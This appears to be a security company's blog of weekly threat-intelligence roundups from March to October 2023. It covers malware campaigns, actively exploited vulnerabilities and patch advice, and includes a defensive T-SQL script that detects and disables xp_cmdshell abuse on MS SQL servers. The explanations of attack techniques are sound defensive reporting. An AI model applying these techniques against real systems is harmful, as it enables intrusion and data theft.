Malvertising (rogue advertisements) remains a point of attention. Malwarebytes recently discovered a Google Ads campaign in which the official domain of KeePass password manager is abused to spread malware. Cybercriminals use Punycode, a way to convert Unicode characters to ASCII. In addition to KeePass, free PDF converters are also advertised, for example.

Research by Uptycs shows that Quasar RAT, an open-source remote access Trojan, is being deployed via DLL sideloading. This technique takes advantage of the trust Windows places in a DLL that a legitimate, signed executable loads from its own directory. Quasar RAT is a remote administration tool written in C# that can collect system information, a list of running applications, files, keystrokes, screenshots, and more. By using DLL sideloading, the cybercriminal hopes to remain invisible while, for example, siphoning data from compromised Windows hosts.

There is an update on the Cisco security advisory. Cisco has added a second vulnerability, registered as CVE-2023-20273, which is used to deploy an implant after initial access has been obtained via CVE-2023-20198. Details regarding this implant and how to identify it have been published in the Cisco security advisory. Both vulnerabilities (CVE-2023-20198 and CVE-2023-20273) are being actively exploited, and research shows that a significant number of exposed Cisco IOS XE systems have the implant running. More info in our blog.

#WakeUpWednesday October 18, 2023

In the period July to September, several attacks with DarkGate malware took place using compromised Skype accounts. According to Trend Micro researchers, the attackers sent victims a message with a PDF attachment through the compromised accounts. This attachment contains a VBA loader script that downloads an AutoIt script, which in turn drops the final DarkGate payload. Access to the Skype account lets the cybercriminal adapt the chat text and the file names to the existing conversation history. In addition to Skype, Microsoft Teams chats are also abused to spread this malware.

During the most recent Patch Tuesday, Microsoft released updates for two actively exploited zero-days in WordPad (CVE-2023-36563) and Skype for Business (CVE-2023-41763). Exploiting the WordPad vulnerability gives a cybercriminal the opportunity to steal the NTLM hashes of user accounts, which can then be relayed or cracked to take over systems. The Skype for Business vulnerability allows a cybercriminal to obtain sensitive information that can be used to gain access to internal networks.

Cybercriminals are using a new technique for code distribution. Guardio Labs has given this the name EtherHiding. This technique abuses Binance’s Smart Chain (BSC) contracts. In this way, malicious scripts are hidden in the blockchain. BSC is described as the “next level bulletproof hosting”. The cybercriminals responsible for this campaign used previously compromised WordPress sites. These pointed to Cloudflare Worker hosts for injecting malicious JavaScript into hacked websites. Cybercriminals have turned to abusing blockchain systems because they provide a much more resilient distribution channel. In addition, it offers better options to hide malicious code.

The Advanced Persistent Threat (APT) actor ToddyCat is linked to a number of new tools by Kaspersky researchers. These tools are aimed at data exfiltration with a focus on maintaining access, performing file operations and loading additional payloads.

Finally, Cisco has published a security advisory describing a critical vulnerability (CVE-2023-20198) in the web UI of Cisco IOS XE. The vulnerability allows an unauthenticated attacker to create a user account with full administrative rights. With this account, the attacker has complete control over the device in question.

#WakeUpWednesday October 11, 2023

Cisco has released updates to address a critical vulnerability (CVE-2023-20101) affecting Cisco Emergency Responder. The vulnerability allows unauthenticated, remote attackers to log into vulnerable systems using hardcoded root credentials. It affects Cisco Emergency Responder release 12.5(1)SU4 and is resolved in release 12.5(1)SU5; other releases of the product are not affected. The advice is to install the available update as soon as possible.

Qualys research shows that proof-of-concept exploits have been published online for a high-severity vulnerability in the dynamic loader of the GNU C library (glibc). It allows a local attacker to gain root privileges on widely used Linux distributions. The vulnerability, named ‘Looney Tunables’ (CVE-2023-4911), is a buffer overflow in the loader's handling of the GLIBC_TUNABLES environment variable and affects default installations of Debian 12 and 13, Ubuntu 22.04 and 23.04, and Fedora 37 and 38.

In addition, Ubuntu has resolved several vulnerabilities in Vim. The updates address, among other things, a vulnerability that could allow a cybercriminal to execute arbitrary code on a user’s system or cause a denial of service.

Finally, the US National Security Agency (NSA) and the Cybersecurity & Infrastructure Security Agency (CISA) have published a joint advisory report. This document describes the most common misconfigurations and the tactics, techniques and procedures used to exploit them.

#WakeUpWednesday October 4, 2023

Last week, new malware variants were discovered, including BunnyLoader. BunnyLoader is malware-as-a-service (MaaS) that offers several capabilities. This includes executing remote commands on the infected device, stealing browser data, and stealing system information. This information is then compressed into a ZIP file after which the data is sent to a command-and-control server. The Zscaler ThreatLabz blog describes how BunnyLoader works in more detail.

In addition, Kaspersky has published information about ASMCrypt. This is a new crypter and loader, which is based on DoubleFinger.

Progress Software has released patches to fix a critical vulnerability in the WS_FTP Server Ad Hoc Transfer Module and the WS_FTP Server manager interface. In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker can exploit a .NET deserialization vulnerability in the Ad Hoc Transfer module. By exploiting this vulnerability, the cybercriminal can execute remote commands on the underlying WS_FTP Server operating system.

Currently, a critical vulnerability in LibWebP is being actively exploited by cybercriminals. More information on this vulnerability can be found in our blog.

#WakeUpWednesday September 27, 2023

Atlassian reports that it has patched several critical vulnerabilities. Exploitation of the vulnerabilities could lead to remote code execution by cybercriminals. The vulnerabilities affect specific versions of Jira Service Management Server and Data Center, Confluence Server and Data Center, Bitbucket Server and Data Center, and Bamboo Server and Data Center. Updates are available for all products mentioned.

The Internet Systems Consortium (ISC) is a not-for-profit organization focused on the development of software and services to support the Internet infrastructure. It has patched several critical vulnerabilities in its products. The vulnerabilities provide the opportunity to carry out a Denial-of-Service (DoS) attack. In this case, it concerns vulnerabilities in the Berkeley Internet Name Domain (BIND) 9 Domain Name System (DNS) software suite.

Apple recently released patches for three new zero-day vulnerabilities that are being actively exploited. These follow the two zero-day vulnerabilities at the beginning of September. This concerns vulnerabilities in iOS, iPadOS, macOS, watchOS and Safari that allow cybercriminals to elevate their privileges, among other things. The advice is therefore to install these updates as soon as possible.

Finally, attention is drawn to a vulnerability in GitLab. This vulnerability occurs in the Enterprise Edition and the Community Edition and allows a cybercriminal to abuse the scan execution policies. This makes it possible to perform pipeline actions as another user. An update is available; here too it is advisable to install it as soon as possible.

#WakeUpWednesday September 20, 2023

Cybercriminals keep expanding their way of working. Attack methods change and new techniques are applied. There is currently a campaign aimed at Facebook Business accounts. The purpose is to collect victims’ login details. This uses a variant of the Python-based NodeStealer malware. This malware compromises all browser cookies and login details. This account information can then be used for further malicious practices.

Research by Trend Micro shows that the cybercriminals behind the info stealers RedLine and Vidar are streamlining their operations and making their techniques multifunctional. The initial payloads are distributed via phishing campaigns. These are signed with Extended Validation (EV) code signing certificates. Ransomware is then spread using the same technique.

Juniper Networks said an estimated 12,000 SRX firewalls and EX switches are affected by a remote code execution vulnerability. Cybercriminals can execute code remotely without authentication. In August, Juniper disclosed several vulnerabilities of the types ‘PHP environment variant manipulation’ and ‘Missing Authentication for Critical Function’. Both watchTowr Labs and VulnCheck have published PoC exploits. Updates are available; it is recommended to install them as soon as possible.

#WakeUpWednesday September 13, 2023

Cisco warns of a vulnerability in Cisco Adaptive Security Appliance (ASA) and Cisco Firepower Threat Defense (FTD). The vulnerability is currently being actively exploited by ransomware groups to gain access to corporate networks. There is currently no update available to resolve this vulnerability. Cisco has published a security update to mitigate the risk of exploitation.

In addition to the above update, Cisco has released updates to address critical vulnerabilities in Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform. The most important vulnerability, a weakness in the single sign-on (SSO) implementation, has been resolved in this update. Successful exploitation of this vulnerability could allow an unauthenticated, remote attacker to spoof credentials required to gain access to an affected system.

Many organizations use Microsoft Teams to facilitate collaboration and communication between employees. TrueSec has identified a phishing campaign that uses Microsoft Teams messages to distribute malicious attachments. Microsoft Teams users receive a ZIP file called ‘Changes to the vacation schedule’. By clicking on the attachment, the ZIP file is downloaded from a SharePoint URL. This file contains an LNK file disguised as a PDF document. A series of actions is then triggered, leading to the installation of a payload identified as DarkGate Loader malware. DarkGate is currently still relatively unknown. However, we see an increase in its spread and in the number of ways it can affect an organization. Alertness is therefore required.

Citizen Lab researchers discovered that cybercriminals exploited two zero-days to infect iPhones with Pegasus spyware. To carry out the attack, the cybercriminals sent malicious images from their iMessage account to the victim. The spyware infection takes place without any further action from the victim. Apple indicates that enabling Lockdown Mode blocks this specific attack. Security updates are available for these vulnerabilities.

#WakeUpWednesday September 6, 2023

Researchers at the University of Wisconsin-Madison have uploaded a proof-of-concept extension to the Chrome Web Store that can steal plaintext passwords from a website’s source code. Research into the text input fields in web browsers shows that the permission model underlying Chrome extensions violates the principle of granting as few privileges as possible. In addition, the researchers found that numerous websites store passwords in clear text in the HTML source code of their web pages, allowing extensions to retrieve them.

Proof-of-concept exploit code has also been released for a critical vulnerability in VMware’s Aria Operations for Networks. The vulnerability concerns an SSH authentication bypass. This vulnerability has been fixed in the update released last Wednesday. In addition, VMware has released an update to a previous vulnerability that allowed attackers to gain administrative privileges and remotely execute code.

Next, a note on the security of Microsoft SQL servers. Securonix analysis shows that cybercriminals currently use poorly secured Microsoft SQL servers to install tools like Cobalt Strike and then execute FreeWorld ransomware. FreeWorld is a newer variant of Mimic ransomware. Initial access to the host is achieved by brute-forcing the MS SQL server. The attackers then use the xp_cmdshell configuration option to run shell commands. The next stage involves hindering the firewall’s activities. They then connect to a remote SMB share to transfer files to and from the victim’s system and install malicious tools such as Cobalt Strike.
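The chain above (brute-forced login, then xp_cmdshell) can be checked for on your own MS SQL servers with a few T-SQL queries. This is an added example for defenders, not code from the original post or from Securonix; it assumes a sysadmin connection via SQL Server Management Studio or sqlcmd.

```sql
-- Added example (not from the original post): hardening and detection checks
-- on an MS SQL server, related to the brute-force -> xp_cmdshell chain above.
-- Assumes a sysadmin connection (SSMS or sqlcmd).

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means T-SQL can spawn OS shell
--    commands, which is what the attackers rely on after getting in.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 2. Hardened setting: turn xp_cmdshell off. Note that any sysadmin login can
--    turn it back on, so an unexpected change back to 1 is an alert, not noise.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Failed logins must be audited for step 4 to show anything.
--    Expected values: 'failure' (the default) or 'all'; 'none' means blind.
EXEC master..xp_loginconfig 'audit level';

-- 4. Evidence of brute forcing: failed logins in the current SQL error log.
--    Arguments: 0 = current log, 1 = SQL Server error log, then search text.
--    A burst of these for 'sa' or other sysadmin logins is the pattern to hunt.
EXEC master..xp_readerrorlog 0, 1, N'Login failed';

-- 5. Which logins are sysadmins, and is 'sa' still enabled? Password-based
--    sysadmin logins exposed to the network are the usual brute-force target.
SELECT sp.name, sp.type_desc, sp.is_disabled
FROM sys.server_principals AS sp
WHERE IS_SRVROLEMEMBER('sysadmin', sp.name) = 1;
```

Query 4 only covers the current error log; loop the first argument over older log numbers (1, 2, ...) if the server rotates logs frequently.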

In a joint international action by police and judicial services, one of the largest botnets, Qakbot, has been defused. Qakbot was one of the largest botnets in the world and was used, among other things, to carry out ransomware attacks, financial fraud and distribute millions of phishing emails. If you want to know whether your data is included in the datasets, you can check this via www.checkjehack.nl

#WakeUpWednesday August 30, 2023

Last week an update was published regarding the Ivanti Sentry vulnerability. Since a PoC exploit is currently available, we recommend patching as soon as possible.

In addition, the FBI warns that Barracuda Networks Email Security Gateway (ESG) devices that have recently been patched for a critical vulnerability are still at risk of being compromised. The solutions offered are judged “ineffective” by the FBI, partly because it continues to observe attacks. In addition, a successful breach acts as a channel to deploy different types of malware. Barracuda advises affected organizations to replace compromised equipment.

Another development in the field of malware is the new Whiffy Recon. Cybercriminals also linked to the Smoke Loader botnet use Whiffy Recon to triangulate the location of infected devices. In addition, the data obtained via WiFi scanning is enriched with data from Google’s geolocation API. With the location data, cybercriminals can carry out more targeted attacks and/or put victims under further pressure.

Finally, an updated version of KmsdBot has been released. This new version also focuses on IoT devices, while at the same time expanding the functionality as well as the possible attack surface. Research from Akamai shows that KmsdBot currently supports multiple CPU architectures and Telnet scanning. The malware targets cloud hosting providers, certain government websites and sites of educational institutions, among others.

#WakeUpWednesday August 23, 2023

There have been many updates regarding critical vulnerabilities in recent weeks. For example, blogs have been published about Citrix ADC, Ivanti Endpoint Manager Mobile and the BeyondTrust PRA/RS vulnerability.

Furthermore, a blog has been published about the vulnerabilities addressed in the Microsoft Patch Tuesday update, including the Microsoft Message Queueing vulnerability.

In addition, a critical vulnerability has also been fixed in WinRAR. The vulnerability in the archiver could be exploited by cybercriminals to remotely execute code after a specially crafted RAR file is opened. The vulnerability was discovered by ‘goodbyeselene’ and was reported to the Zero Day Initiative. An update is available; the advice is to install it as soon as possible.

Juniper Networks has also released an additional security update to mitigate critical vulnerabilities. These are vulnerabilities in the J-Web component of Junos OS. This includes all versions of Junos OS on the SRX and EX series. Combined, these vulnerabilities could allow attackers to remotely execute code on vulnerable devices.

Ivanti has published information regarding a critical vulnerability. The vulnerability is registered as CVE-2023-38035 and allows an unauthenticated attacker with access to the System Manager Portal to make configuration changes to Sentry and the underlying operating system. An update is available; the advice is to install it as soon as possible.

#WakeUpWednesday July 26, 2023

Last week several updates were published regarding critical vulnerabilities in Citrix ADC and Citrix Gateway. The most serious vulnerability is an unauthenticated remote code execution, registered as CVE-2023-3519. This vulnerability could allow a remote, unauthenticated attacker to execute arbitrary code. Exploitation of CVE-2023-3519 has already been observed in the wild. We advise you to install the available software updates as soon as possible.

In addition, security bulletins have been published for Adobe ColdFusion. There are seven vulnerabilities in total, three of which are critical. The seven vulnerabilities affect the following versions: ColdFusion 2018, ColdFusion 2021 and ColdFusion 2023. Updates are available. Our advice is to install them as soon as possible.

Next to this, Ivanti has released a security blog describing a critical vulnerability. The vulnerability is registered as CVE-2023-35078 and allows an unauthenticated remote attacker to access users’ personally identifiable information and make limited changes to the server.

Deployment of Mallox ransomware has increased 174 percent in the past year compared to the same period in the previous year, according to research by Unit 42. Mallox ransomware targets Microsoft (MS) Windows systems. This ransomware family has been active since June 2021. Typically, it exploits unsecured MS-SQL servers as a penetration vector and follows the double extortion model: data is stolen before an organization’s files are encrypted, after which publication of the data is threatened.

Several distributed denial-of-service (DDoS) botnets have been observed exploiting a critical vulnerability in Zyxel devices, according to research by Fortinet. This vulnerability became public in April 2023. The vulnerability, CVE-2023-28771, is a command injection bug that affects multiple firewall models. Exploitation of the vulnerability could allow an unauthorized user to take remote control of the devices.

#WakeUpWednesday July 12, 2023

In the interview that the Autoriteit Persoonsgegevens (Dutch Data Protection Authority) gave to security.nl, a number of reasons for the occurrence of a data breach are discussed. Increasing security awareness among employees, offering the right tools, good supplier management and quickly updating software and systems can contribute to reducing the number of incidents.

Fortinet researchers recently analyzed two samples of the Big Head ransomware. This involved looking at the infection vector and the way in which the malware is executed. Last week, Trend Micro published a report in which they analyzed a third sample in addition to the two previous ones. The conclusion drawn is that this malware was written by the same operator, who is experimenting with different approaches to optimize the attack. Big Head ransomware is a .NET binary that installs three AES-encrypted files on the target system: one is used to distribute the malware, the second is for Telegram bot communication and the third one encrypts files and can also show the user a fake Windows update screen.

Progress, the developer of MOVEit Transfer, has released another update to fix critical vulnerabilities. The most critical vulnerability is an SQL injection bug. In addition, two more minor vulnerabilities are fixed. SQL injection vulnerabilities allow attackers to craft special queries to, for example, access a database. The SQL injection bug has been registered as CVE-2023-36934. It concerns a vulnerability in the web application that can be exploited without user authentication.

Microsoft has again released an update for an issue with Defender Antivirus where users of Windows 11 21H2 and 22H2 received notifications that Local Security Authority Protection was disabled. The problem with LSA Protection has been around for quite some time. The problem was initially supposed to be solved in April. However, that update was withdrawn in May, after which a new update has now been released.

#WakeUpWednesday July 5, 2023

Trend Micro researchers have discovered that ransomware group BlackCat is currently spreading Cobalt Strike malware through malvertising. For example, through the use of Google Ads and/or hijacking specific keywords, fake ads are shown on the search results pages of Bing and Google. In this case, it concerns advertisements for downloading WinSCP. The idea is to trick users searching for applications like WinSCP into downloading malware, in this case a backdoor containing a Cobalt Strike Beacon that connects to a command-and-control server for follow-up actions, such as increasing network access or obtaining higher access rights.

Cybersecurity company Avast has released a free decryptor for the Akira ransomware. Thanks to this decryptor, victims can restore their data without paying a ransom. Both a 64-bit and a 32-bit version are available.

RustBucket malware, targeting Apple macOS systems, has been given improved capabilities for, among other things, avoiding detection by security software, according to Elastic Security Labs researchers. In addition, the malware currently uses a dynamic network infrastructure for command-and-control. Compiled in Swift, the malware works in two stages and is designed to download the main malware from the command-and-control server. This main malware is a Rust-based binary with functions to collect extensive information. Additionally, Mach-O binaries are retrieved from the infected system or shell scripts are executed.

#WakeUpWednesday June 28, 2023

Installing updates is an essential measure to reduce the risk of a cyber incident. Malware is currently active that causes LB-Link and TP-Link routers of the AX21 (AX1800) type to become part of a DDoS network. LB-LINK’s routers are under attack via a vulnerability (CVE-2023-26801) that allows an attacker to execute arbitrary commands on the router. No updates are available yet, so it is advised to take mitigating measures.

In the case of TP-Link, the vulnerability (CVE-2023-1389) allows command injection through the web interface, after which a cybercriminal can install malware. Updates for this vulnerability were already released at the end of April; we advise you to install these (still) as soon as possible.

Fortinet has released an update to address a critical vulnerability in its FortiNAC solution. Malicious people can take over systems remotely by exploiting this vulnerability. The advice is to install the available update as soon as possible.

Furthermore, a critical vulnerability in Zyxel NAS equipment is being actively exploited. This specifically concerns the NAS326, NAS540 and NAS542 types. Exploiting the vulnerability allows cybercriminals to execute system commands on the NAS device without requiring any credentials. An update is available; the advice is to install it as soon as possible.

#WakeUpWednesday June 21, 2023

A new infostealer called Mystic Stealer has gained strong popularity among cybercriminals in recent months. The malware is offered on various forums at a subscription price of $150 per month. The malware targets 40 Web browsers, 70 browser extensions, 21 cryptocurrency applications, 9 MFA and password management applications and 55 cryptocurrency browser extensions, among others.

Mystic Stealer targets all Windows versions, from Windows XP to Windows 11, and supports 32- and 64-bit OS architectures. The malware does not rely on specific system components, minimizing its footprint on infected systems and making detection difficult. In addition, Mystic Stealer performs several anti-virtualization checks, such as inspecting CPUID details to ensure it is not running in sandboxed environments. Both Zscaler and Cyfirma warn of the emergence and sophistication of this malware.

Again, attention to a vulnerability in MOVEit Transfer. Progress recommends that all HTTP access to their environments be restricted after information about a new SQL injection vulnerability (SQLi) became public (CVE-2023-35708). This vulnerability could lead to escalated privileges and unauthorized access to environments. The organization has released security patches to fix this new critical vulnerability for all affected software versions.

BatCloak is a tool designed to obfuscate batch files. These BAT files have been found to be capable of bypassing antivirus detection solutions in about 80% of cases. Trend Micro researchers discovered hundreds of heavily obfuscated batch files used to deploy modified and fully undetectable (FUD) malware. These files demonstrated a remarkable ability to continuously bypass security solutions. As a result, cybercriminals can load different malware families and exploits for subsequent execution without being detected.

#WakeUpWednesday June 14, 2023

Fortinet has released updates to a critical vulnerability in the firmware of its Fortigate firewalls. These updates fix a previously undisclosed vulnerability in SSL VPN devices. The updates have been released in versions 6.0.17, 6.2.15, 6.4.13, 7.0.12 and 7.2.5 of the FortiOS firmware. Our blog provides more information about this critical vulnerability.

Security vulnerabilities have been discovered in Honda’s e-commerce platform. The absence and/or improper implementation of access controls allowed attackers to perform a password reset on Honda’s Power Equipment Tech Express (PETE) website. This allowed attackers to gain unlimited access to sensitive dealer data. Exploiting this vulnerability allowed attackers to gain full admin rights after which dealer data also became accessible and could be manipulated.

In addition to the previous reports surrounding critical vulnerabilities in MOVEit Transfer, new vulnerabilities have been published. All MOVEit Transfer versions are vulnerable. The vulnerability allows unauthenticated attackers to compromise servers exposed over the Internet and modify or extract customer data. It is strongly recommended that the June 9 update be installed as soon as possible.

#WakeUpWednesday June 7, 2023

A number of known vulnerabilities in Zyxel firewalls are currently being actively exploited. Two of these critical vulnerabilities allow an attacker to take over the firewall remotely. The advice is to disable the HTTP/HTTPS services used to manage the devices from the WAN. This will prevent the firewall from being accessed from the Internet. Updates for the vulnerabilities were released in late May. The advice is to install them as soon as possible.

Another vulnerability that is currently being actively exploited is a vulnerability in MOVEit Transfer. This software allows organizations to securely exchange files between organizations and/or with customers. According to Rapid7, this is an SQL injection vulnerability, which can result in remote code execution. Currently, an update is not yet available for every version. To prevent exploitation, it is recommended to block external traffic to ports 80 and 443 on the MOVEit Transfer server. More information on mitigating measures can be found here.

Analysis shows that the Linux variant of the new ransomware family BlackSuit is very similar to Royal ransomware. Based on research conducted by Trend Micro, a very high degree of similarity is apparent, including 98 percent similarity based on functionality. Apart from this high degree of similarity, there are also differences. For example, BlackSuit includes additional command-line arguments, and several files with specific extensions are avoided in the encryption process.

#WakeUpWednesday May 24, 2023

One way to make it harder for cybercriminals to carry out their activities is to use unique, strong passwords. To remember all these passwords, many people use a password manager, such as KeePass. The passwords in KeePass are stored encrypted in a database protected by a master password. Only when logged in with this master password are the stored data accessible. However, due to a vulnerability in KeePass, it is possible in specific cases to retrieve this master password in plain text, regardless of whether the device KeePass is installed on is locked and/or KeePass is active. There is a Proof of Concept (POC) for this vulnerability. The vulnerability impacts versions 2.x for Windows, Linux and macOS. This vulnerability is expected to be fixed with the 2.54 update.

TurkoRat, an open source infostealer, was discovered in two rogue packages in the npm package repository. The infostealer, analyzed by ReversingLabs, targeted login credentials, website cookies and crypto-wallet data, among other things. The two packages, nodejs-encrypt-agent and nodejs-cookie-proxy-agent, were collectively downloaded about 1,200 times before being identified and removed.

Recently, Microsoft observed the use of CL0p ransomware by Sangria Tempest, an actor previously known as FIN7. In the recent attacks, Sangria Tempest uses the PowerShell script POWERTRASH to gain a foothold within the victim network. It then uses OpenSSH and Impacket to move through the network and execute the ransomware.

#WakeUpWednesday May 17, 2023

Configuration errors can be used by cybercriminals as a possible attack path to penetrate an organization. CLR SqlShell malware is a form of malware that targets Microsoft SQL (MS SQL) servers for the purpose of deploying cryptocurrency miners and ransomware. The report shared by AhnLab Security Emergency Response Center indicates that SqlShell is a strain of malware that, once installed on an MS SQL server, supports various functions, such as executing commands from cybercriminals and performing all kinds of malicious behavior.

Cisco Talos describes a new phishing-as-a-service platform called Greatness. The target of these phishing campaigns are corporate Microsoft 365 cloud accounts. Affiliates using Greatness are provided with an attachment and link builder that creates highly convincing bait pages and login pages. This takes into account company logos and background images and the automatic completion of the victim’s email address. In addition, Greatness also offers features such as bypassing multifactor authentication, IP filtering and integration with Telegram bots.

Akira is a new ransomware family first seen during ransomware attacks in March. This family is separate from the 2017 ransomware of the same name. It first exfiltrates data, then deletes Windows Shadow Volume copies from devices with a PowerShell command and encrypts the data. The Windows Restart Manager API is used to close open files if they block the encryption process. The ransom message states that after payment, the attacker will share a “security report” indicating which vulnerability or vulnerabilities were used to get into the victim’s network.

#WakeUpWednesday May 10, 2023

Three critical vulnerabilities in Microsoft Azure API Management service have been disclosed. These include two server-side request forgery (SSRF) vulnerabilities. Ermetic research shows that by exploiting the SSRF vulnerabilities, attackers could send requests from the service’s CORS proxy and the hosting proxy itself and bypass Web application firewalls. The third case involves the abuse of the unlimited file upload functionality in the API Management developer portal. An update is available for these vulnerabilities.

Malware distributed through Google Ads is not new. This technique is also used to spread new malware called LOBSHOT. Elastic Security Labs has written an analysis of how this malware works. LOBSHOT is a remote access trojan that, when run on a system, first checks whether Microsoft Defender is active and then disables it. It then changes the system settings so that the malware automatically launches when the user logs into Windows. It then passes on system information from the infected system, including running processes.

Finally, focus on Fleckpe, an Android trojan. This trojan was spread via legitimate apps in the Google Play Store. Kaspersky researchers discovered the malware in 11 apps, including photo editing apps and smartphone wallpaper apps. The malware has been installed on more than 620,000 devices since 2022. The apps have since been removed from the Play Store. Fleckpe tried to get victims to subscribe to expensive premium services. In doing so, the malware was even able, if an additional confirmation code was required, to extract this code from notifications and use it. This form of malware is currently increasing in popularity, according to Kaspersky.

#WakeUpWednesday May 3, 2023

Cybercriminals are offering a new infostealer on Telegram. This infostealer, named Atomic macOS Stealer (AMOS), targets systems running Apple macOS. Cyble Research and Intelligence Labs researchers say this infostealer steals various types of information, including passwords, full system information, files from the desktop and from the documents folder and even the macOS password. In addition, it also targets multiple browsers and crypto wallets.

Furthermore, a new version of ViperSoftX was discovered by Trend Micro researchers. This malware also falls into the category of infostealers. This new version targets a wider range of targets including more cryptowallets and password managers such as KeePass and 1Password. In addition, it can now infect several other browsers in addition to Chrome. Finally, several tweaks have been made that have improved ViperSoftX’s encryption while ensuring that detection by security tooling is made more difficult.

An update is available for two vulnerabilities in Zyxel firewalls. The first vulnerability (CVE-2023-28771) allows cybercriminals to remotely execute certain OS commands by sending crafted packets to the affected device. This is possible due to improper processing of error messages in some firewall versions. The second is CVE-2023-27991. In this case, an authenticated attacker is able to execute some OS commands remotely.

A vulnerability in Veeam Backup and Replication (VBR) software is currently being exploited by cybercriminals. This vulnerability exposes encrypted credentials stored in the VBR configuration database to unauthenticated users in the backup infrastructure. This can be exploited to gain access to backup infrastructure hosts. Veeam backup servers are currently being targeted by at least one group of cybercriminals known to collaborate with multiple high-profile ransomware gangs. An update is available; the recommendation is to install it as soon as possible.

#WakeUpWednesday April 26, 2023

A critical vulnerability in VMware Aria Operations for Logs can allow an unauthenticated attacker to execute code as root. This vulnerability is registered as CVE-2023-20864 and is present in version 8.10.2. An update has been released for this and it is advised to install it. In addition, vulnerability CVE-2023-20865 has been disclosed for the same product; it is present in other versions of the software. This vulnerability is exploitable only if a cybercriminal already has administrator privileges on the system. More information on these vulnerabilities can be found here.

An update is also available for a vulnerability in Cisco Industrial Network Director (CVE-2023-20036). This vulnerability is located in a WebUI component and is caused by incorrect input validation when uploading a Device Pack. This allows a cybercriminal to execute arbitrary commands on the operating system of an affected device without authorization.

A new “all-in-one” infostealer has surfaced. This malware, called EvilExtractor, contains several modules that operate through an FTP service. Fortinet’s analysis shows that the primary goal of this malware is to steal browser data and information from infected endpoints. This data is then uploaded to the cybercriminal’s FTP server. In addition to stealing information, the malware also allows cybercriminals to roll out ransomware.

Bumblebee malware is also currently being actively spread by using malicious advertisements and influencing search results. Bumblebee can be used to install spyware or ransomware on infected endpoints. Infected installation files that install popular apps such as Zoom, Cisco AnyConnect, ChatGPT and Citrix Workspace are used to spread the malware. Often, these installation files are hosted on websites with a URL similar to that of the official company. Users should take great care to download software only from official websites of these companies. Companies are advised to offer commonly used software centrally to their employees.

#WakeUpWednesday April 19, 2023

New malware is circulating that focuses on stealing user data. This malware, called Zaraza, is offered for sale through Telegram. It additionally uses Telegram as a command-and-control server. Zaraza can steal data from 38 browsers, including Google Chrome, Microsoft Edge and Firefox. For cybercriminals, data such as usernames, passwords, bank details and e-mail accounts are worth gold and can be sold on online marketplaces, for example.

Palo Alto’s Unit 42 team observed a Vice Society data exfiltration script during a recent incident via PowerShell script block logging in the Windows Event Logs. The Vice Society ransomware group developed this script to steal data from victims. In doing so, they take advantage of the Windows PowerShell functionality already present on victims’ systems. This method is called “Living off the Land”: attackers abuse pre-existing software so that they are less likely to be noticed.

Action1, a solution for remote monitoring of endpoints, is currently also being increasingly abused by cybercriminals. Action1 is used by administrators to automate patch management, deploy security updates and provide remote support on endpoints, among other things. Cybercriminals are now abusing the same capabilities during ransomware attacks.

During last week’s Microsoft patch round, three major vulnerabilities were fixed in the Message Queueing service. One of the most important concerns a vulnerability where an unauthenticated attacker has the ability to remotely execute code by sending a specific network packet to the Microsoft Message Queueing service. A security update is available; we recommend installing it as soon as possible.

#WakeUpWednesday April 12, 2023

Two actively exploited zero-day vulnerabilities allow cybercriminals to completely take over Apple systems. These security vulnerabilities are in IOSurfaceAccelerator (CVE-2023-28206) and WebKit (CVE-2023-28205), the browser engine developed by Apple. Apple says it has fixed both vulnerabilities in iOS 16.4.1, iPadOS 16.4.1 and macOS Ventura 13.3.1. For macOS Big Sur and Monterey, version 16.4.1 of Safari has been released that fixes only the WebKit vulnerability.

The Balada Injector malware caused a lot of damage to WordPress websites. More than 1 million websites were infected by this malware that has been active since 2017. This Balada Injector campaign exploited vulnerabilities in themes and plug-ins to invade websites. Among other things, the malware creates a user account with administrator privileges. In addition, it collects data from the host system and creates backdoors to maintain access. WordPress users are advised to keep their software up-to-date, change the admin user password to a strong one and remove unused themes and plug-ins.

Taiwanese company Micro-Star International (MSI) has officially confirmed that it suffered a ransomware attack. MSI did not disclose details on how or when the attack occurred, but does say that it immediately initiated its incident response protocol. MSI further states that affected systems are gradually returning to normal operation and says users should only download and install firmware/BIOS updates from its official website and not from other sources.

SD Worx (Belgium) has been hit by a cyber-attack. SD Worx performs HR and payroll operations and serves 5.2 million employees across more than 82,000 companies. After discovering the malicious activity in the data center, the systems were pre-emptively isolated to limit further consequences. This affects UK customers. At this time, they are unable to log into SD Worx’s systems and will be kept informed of how the situation develops.

#WakeUpWednesday April 5, 2023

Several malware botnets are currently targeting Cacti and Realtek vulnerabilities with the goal of spreading ShellBot and Moobot malware. Moobot is a variant of Mirai malware. This malware was detected in December 2021 when it targeted Hikvision cameras. Since then, the malware has been updated and targets multiple D-Link RCE vulnerabilities. One of Moobot’s functionalities is its ability to scan for other known bots, after which the associated processes are terminated. In this way, Moobot can utilize its maximum capacity to carry out DDoS attacks. ShellBot was first discovered in January 2023 and targets the Cacti vulnerability. Fortinet has spotted three versions of this malware, indicating that it is being actively maintained and modified. We recommend installing (security) updates as soon as they become available. If a device is no longer actively maintained by a vendor, replace it with a newer model. If that is not possible, ensure good detection and response capabilities in the periphery of the device.

SentinelLabs has analyzed several versions of AlienFox. AlienFox is a set of scripts distributed primarily through Telegram that is also easily accessible on GitHub and elsewhere. As a result, the scripts are constantly being modified by cybercriminals, creating multiple versions. AlienFox is primarily used to collect API keys and information from popular services, including information from configuration files of service providers such as AWS, Google Workspace, Office365, OneSignal and Twilio.

Furthermore, new malware aimed at stealing information has been discovered. Named MacStealer, this malware targets Apple’s Catalina and later macOS versions on Intel, M1 and M2 CPUs. Although the malware is still under development, it is already capable of exfiltrating iCloud Keychain data, passwords and credit card information stored in browsers such as Brave, Google Chrome and Mozilla Firefox.

The Voice over IP (VoIP) desktop client 3CXDesktopApp, with version numbers 18.12.407 and 18.12.416, likely contains a library modified by a cybercriminal to carry out supply chain attacks. When used in your environment, the 3CXDesktopApp can be used to download malicious payloads to the system on which it is installed. Currently, these payloads appear to be information-stealing malware. At present, the 3CXDesktopApp for Microsoft Windows and macOS is known to contain the malicious code.

#WakeUpWednesday March 29, 2023

